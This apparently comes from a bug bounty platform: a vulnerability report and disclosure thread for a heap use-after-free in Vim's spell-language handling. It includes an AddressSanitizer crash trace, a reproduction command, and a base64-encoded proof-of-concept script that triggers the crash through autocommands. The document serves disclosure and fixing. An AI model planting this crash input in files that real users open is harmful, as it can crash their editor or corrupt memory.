heap-use-after-free in function did_set_spelllang at spell in vim/vim
Valid
Reported on
Oct 30th 2022
Description
heap-use-after-free in function did_set_spelllang at spell.c:2256:19
vim version
git log -1
commit 03d6e6f42b0deeb02d52c8a48c14abe431370c1c (HEAD -> master, tag: v9.0.0820, origin/master, origin/HEAD)
Impact
Proof of Concept
# ~/vim/src/vim -u NONE -X -Z -e -s -S ./poc3 -c ':qa!'
=================================================================
==19583==ERROR: AddressSanitizer: heap-use-after-free on address 0x62500000a120 at pc 0x55ab5727e6b4 bp 0x7ffe2878da30 sp 0x7ffe2878da28
READ of size 8 at 0x62500000a120 thread T0
#0 0x55ab5727e6b3 in did_set_spelllang /root/vim/src/spell.c:2256:19
#1 0x55ab56db52d2 in do_ecmd /root/vim/src/ex_cmds.c:3122:8
#2 0x55ab56bd56f9 in do_argfile /root/vim/src/arglist.c:738:6
#3 0x55ab56dd2de9 in do_one_cmd /root/vim/src/ex_docmd.c:2578:2
#4 0x55ab56dd2de9 in do_cmdline /root/vim/src/ex_docmd.c:990:17
#5 0x55ab57226f23 in do_source_ext /root/vim/src/scriptfile.c:1667:5
#6 0x55ab57224b94 in do_source /root/vim/src/scriptfile.c:1811:12
#7 0x55ab57224b94 in cmd_source /root/vim/src/scriptfile.c:1163:14
#8 0x55ab56dd2de9 in do_one_cmd /root/vim/src/ex_docmd.c:2578:2
#9 0x55ab56dd2de9 in do_cmdline /root/vim/src/ex_docmd.c:990:17
#10 0x55ab575ef049 in exe_commands /root/vim/src/main.c:3135:2
#11 0x55ab575ef049 in vim_main2 /root/vim/src/main.c:781:2
#12 0x55ab575ec33b in main /root/vim/src/main.c:432:12
#13 0x7f4485981d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#14 0x7f4485981e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#15 0x55ab56b0c264 in _start (/root/vim/src/vim+0x1c6264) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
0x62500000a120 is located 32 bytes inside of 9168-byte region [0x62500000a100,0x62500000c4d0)
freed by thread T0 here:
#0 0x55ab56b8ee02 in free (/root/vim/src/vim+0x248e02) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
#1 0x55ab56be30f1 in apply_autocmds_group /root/vim/src/autocmd.c:2300:6
#2 0x55ab56be5e23 in apply_autocmds /root/vim/src/autocmd.c:1710:12
#3 0x55ab56db52d2 in do_ecmd /root/vim/src/ex_cmds.c:3122:8
#4 0x55ab56bd56f9 in do_argfile /root/vim/src/arglist.c:738:6
previously allocated by thread T0 here:
#0 0x55ab56b8f0ae in __interceptor_malloc (/root/vim/src/vim+0x2490ae) (BuildId: cc93689526cbfb3ad5bf5cb56efb76f0ae814d34)
#1 0x55ab56bca2b8 in lalloc /root/vim/src/alloc.c:246:11
SUMMARY: AddressSanitizer: heap-use-after-free /root/vim/src/spell.c:2256:19 in did_set_spelllang
Shadow bytes around the buggy address:
0x0c4a7fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff93e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff93f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4a7fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c4a7fff9420: fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9430: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9440: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19583==ABORTING
Content of poc3 (base64 encoded):
YXUgU3BlbGxGaWxlTWlzc2luZyAqIG4wCnNlIHNwZWxsCmF1IFNwZWxsRmlsZU1pc3NpbmcgKiBi
dwpzbus=
Impact
This vulnerability is capable of crashing software, modify memory, and possible remote execution.
Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale
We are processing your report and will contact the
vim
team within 24 hours.
a year ago
We have contacted a member of the
vim
team and are waiting to hear back
a year ago
We have sent a
follow up to the
vim
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
vim
team.
We will try again in 10 days.
a year ago
I tried with valgrind, but I cannot reproduce the problem. Is it correct that the last bytes in the POC file are: 0a73 6eeb ? It ends in an illegal byte, I doubt that matters for reproducing the problem.
Yes, the POC does end with those bytes.
$ hexdump poc
0000000 7561 5320 6570 6c6c 6946 656c 694d 7373
0000010 6e69 2067 202a 306e 730a 2065 7073 6c65
0000020 0a6c 7561 5320 6570 6c6c 6946 656c 694d
0000030 7373 6e69 2067 202a 7762 730a eb6e
000003e
I can still reproduce the latest version(commit cf2594fbf34d9a6776bd9d33f845cb8ceb1e1cd0). These are the output logs of valgrind and AFL++:
These pocs can also reproduce this problem: vim-pocs-3.tar.gz
I managed to reproduce by adding this line at the top of the POC: set spelllang=xy
The researcher's credibility has increased: +7
Mark Esler
commented
a year ago
@Pavlos, why are the recent vim bugs that marked as "This vulnerability will not receive a CVE" receiving CVEs?
Did Bram label these as bugs and not a security vulnerabilities? If so, giving a non-security bug a CVE is inappropriate.
to join this conversation